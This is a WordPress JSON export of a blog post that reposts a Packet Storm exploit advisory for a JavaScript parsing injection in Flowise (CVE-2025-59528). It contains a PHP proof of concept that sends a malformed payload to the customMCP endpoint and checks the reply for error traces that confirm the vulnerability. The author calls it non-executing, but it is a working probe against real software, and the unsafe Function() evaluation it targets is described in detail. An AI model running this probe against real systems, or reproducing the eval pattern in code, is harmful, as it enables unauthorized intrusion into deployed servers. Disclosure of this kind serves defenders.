{"id":30431,"date":"2025-12-11T11:38:30","date_gmt":"2025-12-11T11:38:30","guid":{"rendered":"http:\/\/localhost\/?p=30431"},"modified":"2025-12-11T11:38:30","modified_gmt":"2025-12-11T11:38:30","slug":"flowise-306-js-parsing-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30431","title":{"rendered":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727"},"content":{"rendered":"

{“lastseen”:”2025-12-11T17:25:02″,”description”:”A JavaScript parsing injection vulnerability exists in Flowise versions prior to 3.0.6 and greater than 2.2.7-patch.1…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212727″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59528″],”sourceData”:”=============================================================================================================================================\\n | # Title : Flowise 3.0.6 JS Parsing Injection Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/flowiseai.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211933\/ \\u0026 \\tCVE-2025-59528 \\n \\n [+] Summary : \\n \\n A JavaScript Parsing Injection vulnerability exists in the following Flowise versions:\\n \\n Affected: \\u003e= 2.2.7-patch.1 and \\u003c 3.0.6\\n \\n Unauthenticated exploitation possible for versions \\u003c 3.0.1\\n \\n Authentication required for versions \\u003e= 3.0.1\\n \\n The vulnerability resides in the endpoint : \/api\/v1\/node-load-method\/customMCP\\n \\n Flowise internally evaluates user input using: Function(‘return ‘ + inputString)()\\n \\n This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.\\n \\n This report does NOT demonstrate RCE and does NOT execute system commands.\\n It focuses strictly on parsing injection as requested.\\n \\n 2. Vulnerability Description\\n \\n The parameter: inputs.mcpServerConfig\\n \\n is passed directly to a JavaScript interpreter via: Function(\\”return \\” + input)\\n \\n Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:\\n \\n Attempt to interpret the injected JavaScript\\n \\n Generate SyntaxError, ReferenceError, or Unexpected token exceptions\\n \\n Leak internal execution traces\\n \\n Confirm the backend is evaluating untrusted JS strings\\n \\n This behavior proves the system is vulnerable to JavaScript parsing injection.\\n \\n 3. Impact\\n \\n Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context.\\n \\n The confirmed impact here is:\\n \\n JavaScript parsing injection\\n \\n Potential denial of service via crafted parsing payloads\\n \\n Internal error leakage\\n \\n Strong indicator of further exploitable unsafe evaluation paths\\n \\n This advisory documents only the safe, non-executing variant.\\n \\n poc\\n \\n \\u003c?php\\n \/**\\n * Flowise JS Parsing Injection PoC by indoushka\\n * ————————————————-\\n * Demonstrates unsafe JavaScript evaluation through controlled parsing failure.\\n *\/\\n \\n $target = \\”http:\/\/victim-flowise:3000\/api\/v1\/node-load-method\/customMCP\\”;\\n \\n \/\/ Malformed JS that forces the backend parser to reveal unsafe Function() behavior\\n $payload = ‘{x:(function(){ invalid_code_here++ })()}’;\\n \\n $data = [\\n \\”loadMethod\\” =\\u003e \\”listActions\\”,\\n \\”inputs\\” =\\u003e [\\n \\”mcpServerConfig\\” =\\u003e $payload\\n ]\\n ];\\n \\n $options = [\\n \\”http\\” =\\u003e [\\n \\”header\\” =\\u003e \\”Content-Type: application\/json\\\\r\\\\n\\”,\\n \\”method\\” =\\u003e \\”POST\\”,\\n \\”content\\” =\\u003e json_encode($data),\\n \\”timeout\\” =\\u003e 6\\n ]\\n ];\\n \\n echo \\”[*] Sending Parsing Injection Payload…\\\\n\\”;\\n \\n $context = stream_context_create($options);\\n $response = @file_get_contents($target, false, $context);\\n \\n echo \\”———————————–\\\\n\\”;\\n \\n if (!$response) {\\n echo \\”[!] Target did not respond.\\\\n\\”;\\n exit;\\n }\\n \\n \/\/ Detection patterns\\n if (preg_match(‘\/SyntaxError|ReferenceError|Unexpected|stack\/i’, $response)) {\\n echo \\”[+] Vulnerable: JS Parsing Injection confirmed.\\\\n\\”;\\n echo \\”[+] Evidence: Backend attempted to interpret injected JS.\\\\n\\”;\\n } else {\\n echo \\”[-] Not vulnerable or patched.\\\\n\\”;\\n }\\n \\n echo \\”———————————–\\\\n\\”;\\n echo \\”[*] Raw Response:\\\\n$response\\\\n\\”;\\n \\n \\n Save as : poc.php\\n \\n run : php poc.php\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212727″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212727\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-11T17:25:02″,”description”:”A JavaScript parsing injection vulnerability exists in Flowise versions prior to 3.0.6 and greater than 2.2.7-patch.1…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212727″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59528″],”sourceData”:”=============================================================================================================================================\\n | # Title :…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-30431","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30431\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-11T17:25:02″,”description”:”A JavaScript parsing injection vulnerability exists in Flowise versions prior to 3.0.6 and greater than 2.2.7-patch.1…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212727″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59528″],”sourceData”:”=============================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30431\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-11T11:38:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727\",\"datePublished\":\"2025-12-11T11:38:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431\"},\"wordCount\":699,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30431#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431\",\"name\":\"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-11T11:38:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30431\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30431#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30431","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem","og_description":"{“lastseen”:”2025-12-11T17:25:02″,”description”:”A JavaScript parsing injection vulnerability exists in Flowise versions prior to 3.0.6 and greater than 2.2.7-patch.1…”,”published”:”2025-12-11T00:00:00″,”modified”:”2025-12-11T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212727″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-59528″],”sourceData”:”=============================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=30431","og_site_name":"zero redgem","article_published_time":"2025-12-11T11:38:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30431#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30431"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727","datePublished":"2025-12-11T11:38:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30431"},"wordCount":699,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30431#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30431","url":"https:\/\/zero.redgem.net\/?p=30431","name":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-11T11:38:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30431#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30431"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30431#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Flowise 3.0.6 JS Parsing Injection_PACKETSTORM:212727"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30431","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30431"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30431\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30431"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}